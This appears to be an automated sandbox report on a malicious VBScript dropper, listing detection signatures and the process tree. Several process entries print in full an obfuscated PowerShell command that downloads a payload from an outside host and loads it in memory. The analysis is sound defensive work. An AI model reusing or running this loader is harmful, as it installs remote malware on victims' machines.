Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Doc13032025.vbs

Overview

General Information

Sample name:Doc13032025.vbs
Analysis ID:1636873
MD5:188e7231fcea51d4ead4d2fbfeb435b6
SHA1:8adac6b4a9f7ca88bea76e230c0803ec4efb32a6
SHA256:6ef147fad49263cc33d1b2391e2647ca0aa81a28c3e4bb4d195493b6b713407d
Tags:vbsuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Potential malicious VBS script found (suspicious strings)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 8384 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc13032025.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 8432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bm#Gw#dQB4#Gk#bwBu#GE#b#Bp#HQ#eQ#g#D0#I##n#HQ#e#B0#C4#Z#Bu#Gk#bQ#v#Gw#dQBv#HM#LwB1#GU#LgBz#G4#Z#B5#C4#b#B1#G8#Z#Bl#HI#bwBt#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#cQB1#GE#Z#By#Gk#bgB2#GE#cgBp#GE#bgB0#C##PQ#g#CQ#ZgBs#HU#e#Bp#G8#bgBh#Gw#aQB0#Hk#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#YQBp#HI#aQBu#Gc#I##9#C##JwBo#HQ#d#Bw#HM#Og#v#C8#MQ#w#DE#OQ#u#GY#aQBs#GU#bQBh#Gk#b##u#GM#bwBt#C8#YQBw#Gk#LwBm#Gk#b#Bl#C8#ZwBl#HQ#PwBm#Gk#b#Bl#Gs#ZQB5#D0#WgBy#Es#V#BO#G8#LQBf#EQ#TQBX#Gc#bQ#w#G8#bwBu#FM#cg#5#Dc#SgBB#Gs#Z#By#FU#cQBi#Ek#QwBW#GU#Rw#y#Ew#bQB1#GM#b#B6#HU#TwBO#DI#WgBh#HY#SwBx#HM#UQBn#D##TgBx#EM#a#BT#Ew#V##0#EE#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#MQ#2#D##Ng#5#Dc#N#Bi#Dc#O#Bl#GI#MQ#n#Ds#J#Bs#G8#awBv#HI#eQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#FM#YQBs#GU#cwBp#GE#bgBz#C##PQ#g#CQ#b#Bv#Gs#bwBy#Hk#cw#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#GE#aQBy#Gk#bgBn#Ck#Ow#k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#UwBh#Gw#ZQBz#Gk#YQBu#HM#KQ#7#CQ#bQBl#HM#a#Bl#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#HU#bgBk#GU#cgBj#Gw#dQBi#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#I##9#C##J#Bk#Hk#bgBh#G0#bwBn#GU#bg#u#Ek#bgBk#GU#e#BP#GY#K##k#G0#ZQBz#Gg#ZQBz#Ck#Ow#k#GY#cgBp#HM#awBl#HQ#cw#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#dQBu#GQ#ZQBy#GM#b#B1#GI#KQ#7#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GY#cgBp#HM#awBl#HQ#cw#g#C0#ZwB0#C##J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#Ds#J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#C##Kw#9#C##J#Bt#GU#cwBo#GU#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bz#HU#c#Bl#HI#dgBp#HI#aQBs#Gk#d#B5#C##PQ#g#CQ#ZgBy#Gk#cwBr#GU#d#Bz#C##LQ#g#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#7#CQ#b#Bp#G8#Z#Bl#HI#YQ#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#L##g#CQ#cwB1#H##ZQBy#HY#aQBy#Gk#b#Bp#HQ#eQ#p#Ds#J#Bt#GE#cgBh#GI#bwB1#HQ#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bs#Gk#bwBk#GU#cgBh#Ck#Ow#k#GM#bwBu#HQ#cgBp#HQ#aQBv#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#bQBh#HI#YQBi#G8#dQB0#HM#KQ#7#CQ#YwBv#Gw#c#Bv#HI#cgBo#GU#e#Bp#HM#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bx#HU#YQBk#HI#aQBu#HY#YQBy#Gk#YQBu#HQ#L##n#Cc#L##n#Cc#L##n#Cc#L##n#GE#cwBw#G4#ZQB0#F8#YwBv#G0#c#Bp#Gw#ZQBy#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Gg#d#B0#H##Og#v#C8#bQBv#HI#ZQBk#G8#dQBs#C4#eQBk#G4#cw#u#GU#dQ#v#HM#bwB1#Gw#LwBt#Gk#bgBk#C4#d#B4#HQ#Jw#s#Cc#Qw#6#Fw#U#By#G8#ZwBy#GE#bQBE#GE#d#Bh#Fw#Jw#s#Cc#ZgBl#HI#cgBp#GM#eQBh#G4#a#B5#GQ#cgBp#GM#Jw#s#Cc#dgBi#HM#Jw#s#Cc#MQ#n#Cw#Jw#x#Cc#L##n#GY#ZQBy#HI#aQBj#Hk#YQBu#Gg#eQBk#HI#aQBj#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 8432JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 8432INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x2c118:$b2: ::FromBase64String(
    • 0x2cd77:$b2: ::FromBase64String(
    • 0x2f139:$b2: ::FromBase64String(
    • 0x4d68a:$b2: ::FromBase64String(
    • 0x4e48a:$b2: ::FromBase64String(
    • 0xcefe4:$b2: ::FromBase64String(
    • 0xcfc46:$b2: ::FromBase64String(
    • 0xd0aaa:$b2: ::FromBase64String(
    • 0xd637e:$b2: ::FromBase64String(
    • 0xd6fdd:$b2: ::FromBase64String(
    • 0xdd5be:$b2: ::FromBase64String(
    • 0xde21d:$b2: ::FromBase64String(
    • 0x1a59ad:$b2: ::FromBase64String(
    • 0x1f6a42:$b2: ::FromBase64String(
    • 0x1f7658:$b2: ::FromBase64String(
    • 0x1fcb1e:$b2: ::FromBase64String(
    • 0x1fd820:$b2: ::FromBase64String(
    • 0x1fe482:$b2: ::FromBase64String(
    • 0x22ce61:$b2: ::FromBase64String(
    • 0x234e09:$b2: ::FromBase64String(
    • 0x26bd6a:$b2: ::FromBase64String(
    SourceRuleDescriptionAuthorStrings
    amsi64_8432.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      amsi64_8432.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bm#Gw#dQB4#Gk#bwBu#GE#b#Bp#HQ#eQ#g#D0#I##n#HQ#e#B0#C4#Z#Bu#Gk#bQ#v#Gw#dQBv#HM#LwB1#GU#LgBz#G4#Z#B5#C4#b#B1#G8#Z#Bl#HI#bwBt#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#cQB1#GE#Z#By#Gk#bgB2#GE#cgBp#GE#bgB0#C##PQ#g#CQ#ZgBs#HU#e#Bp#G8#bgBh#Gw#aQB0#Hk#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#YQBp#HI#aQBu#Gc#I##9#C##JwBo#HQ#d#Bw#HM#Og#v#C8#MQ#w#DE#OQ#u#GY#aQBs#GU#bQBh#Gk#b##u#GM#bwBt#C8#YQBw#Gk#LwBm#Gk#b#Bl#C8#ZwBl#HQ#PwBm#Gk#b#Bl#Gs#ZQB5#D0#WgBy#Es#V#BO#G8#LQBf#EQ#TQBX#Gc#bQ#w#G8#bwBu#FM#cg#5#Dc#SgBB#Gs#Z#By#FU#cQBi#Ek#QwBW#GU#Rw#y#Ew#bQB1#GM#b#B6#HU#TwBO#DI#WgBh#HY#SwBx#HM#UQBn#D##TgBx#EM#a#BT#Ew#V##0#EE#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#MQ#2#D##Ng#5#Dc#N#Bi#Dc#O#Bl#GI#MQ#n#Ds#J#Bs#G8#awBv#HI#eQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#FM#YQBs#GU#cwBp#GE#bgBz#C##PQ#g#CQ#b#Bv#Gs#bwBy#Hk#cw#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#GE#aQBy#Gk#bgBn#Ck#Ow#k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#UwBh#Gw#ZQBz#Gk#YQBu#HM#KQ#7#CQ#bQBl#HM#a#Bl#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#HU#bgBk#GU#cgBj#Gw#dQBi#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#I##9#C##J#Bk#Hk#bgBh#G0#bwBn#GU#bg#u#Ek#bgBk#GU#e#BP#GY#K##k#G0#ZQBz#Gg#ZQBz#Ck#Ow#k#GY#cgBp#HM#awBl#HQ#cw#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#dQBu#GQ#ZQBy#GM#b#B1#GI#KQ#7#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GY#cgBp#HM#awBl#HQ#cw#g#C0#ZwB0#C##J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#Ds#J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#C##Kw#9#C##J#Bt#GU#cwBo#GU#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bz#HU#c#Bl#HI#dgBp#HI#aQBs#Gk#d#B5#C##PQ#g#CQ#ZgBy#Gk#cwBr#GU#d#Bz#C##LQ#g#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#7#CQ#b#Bp#G8#Z#Bl#HI#YQ#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#L##g#CQ#cwB1#H##ZQBy#HY#aQBy#Gk#b#Bp#HQ#eQ#p#Ds#J#Bt#GE#cgBh#GI#bwB1#HQ#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bs#Gk#bwBk#GU#cgBh#Ck#Ow#k#GM#bwBu#HQ#cgBp#HQ#aQBv#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#bQBh#HI#YQBi#G8#dQB0#HM#KQ#7#CQ#YwBv#Gw#c#Bv#HI#cgBo#GU#e#Bp#HM#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bx#HU#YQBk#HI#aQBu#HY#YQBy#Gk#YQBu#HQ#L##n#Cc#L##n#Cc#L##n#Cc#L##n#GE#cwBw#G4#ZQB0#F8#YwBv#G0#c#Bp#Gw#ZQBy#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Gg#d#B0#H##Og#v#C8#bQBv#HI#ZQBk#G8#dQBs#C4#eQBk#G4#cw#u#GU#dQ#v#HM#bwB1#Gw#LwBt#Gk#bgBk#C4#d#B4#HQ#Jw#s#Cc#Qw#6#Fw#U#By#G8#ZwBy#GE#bQBE#GE#d#Bh#Fw#Jw#s#Cc#ZgBl#HI#cgBp#GM#eQBh#G4#a#B5#GQ#cgBp#GM#Jw#s#Cc#dgBi#HM#Jw#s#Cc#MQ#n#Cw#Jw#x#Cc#L##n#
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bm#Gw#dQB4#Gk#bwBu#GE#b#Bp#HQ#eQ#g#D0#I##n#HQ#e#B0#C4#Z#Bu#Gk#bQ#v#Gw#dQBv#HM#LwB1#GU#LgBz#G4#Z#B5#C4#b#B1#G8#Z#Bl#HI#bwBt#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#cQB1#GE#Z#By#Gk#bgB2#GE#cgBp#GE#bgB0#C##PQ#g#CQ#ZgBs#HU#e#Bp#G8#bgBh#Gw#aQB0#Hk#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#YQBp#HI#aQBu#Gc#I##9#C##JwBo#HQ#d#Bw#HM#Og#v#C8#MQ#w#DE#OQ#u#GY#aQBs#GU#bQBh#Gk#b##u#GM#bwBt#C8#YQBw#Gk#LwBm#Gk#b#Bl#C8#ZwBl#HQ#PwBm#Gk#b#Bl#Gs#ZQB5#D0#WgBy#Es#V#BO#G8#LQBf#EQ#TQBX#Gc#bQ#w#G8#bwBu#FM#cg#5#Dc#SgBB#Gs#Z#By#FU#cQBi#Ek#QwBW#GU#Rw#y#Ew#bQB1#GM#b#B6#HU#TwBO#DI#WgBh#HY#SwBx#HM#UQBn#D##TgBx#EM#a#BT#Ew#V##0#EE#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#MQ#2#D##Ng#5#Dc#N#Bi#Dc#O#Bl#GI#MQ#n#Ds#J#Bs#G8#awBv#HI#eQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#FM#YQBs#GU#cwBp#GE#bgBz#C##PQ#g#CQ#b#Bv#Gs#bwBy#Hk#cw#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#GE#aQBy#Gk#bgBn#Ck#Ow#k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#UwBh#Gw#ZQBz#Gk#YQBu#HM#KQ#7#CQ#bQBl#HM#a#Bl#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#HU#bgBk#GU#cgBj#Gw#dQBi#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#I##9#C##J#Bk#Hk#bgBh#G0#bwBn#GU#bg#u#Ek#bgBk#GU#e#BP#GY#K##k#G0#ZQBz#Gg#ZQBz#Ck#Ow#k#GY#cgBp#HM#awBl#HQ#cw#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#dQBu#GQ#ZQBy#GM#b#B1#GI#KQ#7#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GY#cgBp#HM#awBl#HQ#cw#g#C0#ZwB0#C##J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#Ds#J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#C##Kw#9#C##J#Bt#GU#cwBo#GU#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bz#HU#c#Bl#HI#dgBp#HI#aQBs#Gk#d#B5#C##PQ#g#CQ#ZgBy#Gk#cwBr#GU#d#Bz#C##LQ#g#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#7#CQ#b#Bp#G8#Z#Bl#HI#YQ#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#L##g#CQ#cwB1#H##ZQBy#HY#aQBy#Gk#b#Bp#HQ#eQ#p#Ds#J#Bt#GE#cgBh#GI#bwB1#HQ#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bs#Gk#bwBk#GU#cgBh#Ck#Ow#k#GM#bwBu#HQ#cgBp#HQ#aQBv#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#bQBh#HI#YQBi#G8#dQB0#HM#KQ#7#CQ#YwBv#Gw#c#Bv#HI#cgBo#GU#e#Bp#HM#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bx#HU#YQBk#HI#aQBu#HY#YQBy#Gk#YQBu#HQ#L##n#Cc#L##n#Cc#L##n#Cc#L##n#GE#cwBw#G4#ZQB0#F8#YwBv#G0#c#Bp#Gw#ZQBy#Cc#L##n#Cc#L##n#Cc#L##n#Cc#L##n#Gg#d#B0#H##Og#v#C8#bQBv#HI#ZQBk#G8#dQBs#C4#eQBk#G4#cw#u#GU#dQ#v#HM#bwB1#Gw#LwBt#Gk#bgBk#C4#d#B4#HQ#Jw#s#Cc#Qw#6#Fw#U#By#G8#ZwBy#GE#bQBE#GE#d#Bh#Fw#Jw#s#Cc#ZgBl#HI#cgBp#GM#eQBh#G4#a#B5#GQ#cgBp#GM#Jw#s#Cc#dgBi#HM#Jw#s#Cc#MQ#n#Cw#Jw#x#Cc#L##n#
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc13032025.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc13032025.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc13032025.vbs", ProcessId: 8384, ProcessName: wscript.exe
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc13032025.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc13032025.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc13032025.vbs", ProcessId: 8384, ProcessName: wscript.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bm#Gw#dQB4#Gk#bwBu#GE#b#Bp#HQ#eQ#g#D0#I##n#HQ#e#B0#C4#Z#Bu#Gk#bQ#v#Gw#dQBv#HM#LwB1#GU#LgBz#G4#Z#B5#C4#b#B1#G8#Z#Bl#HI#bwBt#C8#Lw#6#H##d#B0#Gg#Jw#7#CQ#cQB1#GE#Z#By#Gk#bgB2#GE#cgBp#GE#bgB0#C##PQ#g#CQ#ZgBs#HU#e#Bp#G8#bgBh#Gw#aQB0#Hk#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#YQBp#HI#aQBu#Gc#I##9#C##JwBo#HQ#d#Bw#HM#Og#v#C8#MQ#w#DE#OQ#u#GY#aQBs#GU#bQBh#Gk#b##u#GM#bwBt#C8#YQBw#Gk#LwBm#Gk#b#Bl#C8#ZwBl#HQ#PwBm#Gk#b#Bl#Gs#ZQB5#D0#WgBy#Es#V#BO#G8#LQBf#EQ#TQBX#Gc#bQ#w#G8#bwBu#FM#cg#5#Dc#SgBB#Gs#Z#By#FU#cQBi#Ek#QwBW#GU#Rw#y#Ew#bQB1#GM#b#B6#HU#TwBO#DI#WgBh#HY#SwBx#HM#UQBn#D##TgBx#EM#a#BT#Ew#V##0#EE#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#MQ#2#D##Ng#5#Dc#N#Bi#Dc#O#Bl#GI#MQ#n#Ds#J#Bs#G8#awBv#HI#eQBz#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#FM#YQBs#GU#cwBp#GE#bgBz#C##PQ#g#CQ#b#Bv#Gs#bwBy#Hk#cw#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#GE#aQBy#Gk#bgBn#Ck#Ow#k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#UwBh#Gw#ZQBz#Gk#YQBu#HM#KQ#7#CQ#bQBl#HM#a#Bl#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#HU#bgBk#GU#cgBj#Gw#dQBi#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#I##9#C##J#Bk#Hk#bgBh#G0#bwBn#GU#bg#u#Ek#bgBk#GU#e#BP#GY#K##k#G0#ZQBz#Gg#ZQBz#Ck#Ow#k#GY#cgBp#HM#awBl#HQ#cw#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#dQBu#GQ#ZQBy#GM#b#B1#GI#KQ#7#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GY#cgBp#HM#awBl#HQ#cw#g#C0#ZwB0#C##J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#Ds#J#Bs#G8#Z#Bn#GU#bQBl#G4#d#Bz#C##Kw#9#C##J#Bt#GU#cwBo#GU#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bz#HU#c#Bl#HI#dgBp#HI#aQBs#Gk#d#B5#C##PQ#g#CQ#ZgBy#Gk#cwBr#GU#d#Bz#C##LQ#g#CQ#b#Bv#GQ#ZwBl#G0#ZQBu#HQ#cw#7#CQ#b#Bp#G8#Z#Bl#HI#YQ#g#D0#I##k#GQ#eQBu#GE#bQBv#Gc#ZQBu#C4#UwB1#GI#cwB0#HI#aQBu#Gc#K##k#Gw#bwBk#Gc#ZQBt#GU#bgB0#HM#L##g#CQ#cwB1#H##ZQBy#HY#aQBy#Gk#b#Bp#HQ#eQ#p#Ds#J#Bt#GE#cgBh#GI#bwB1#HQ#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bs#Gk#bwBk#GU#cgBh#Ck#Ow#k#GM#bwBu#HQ#cgBp#HQ#aQBv#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#bQBh#HI#YQBi#G8#dQB0#HM#KQ#7#CQ#YwBv#Gw#c#Bv#HI#cgBo#GU#e#Bp#HM#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#Lg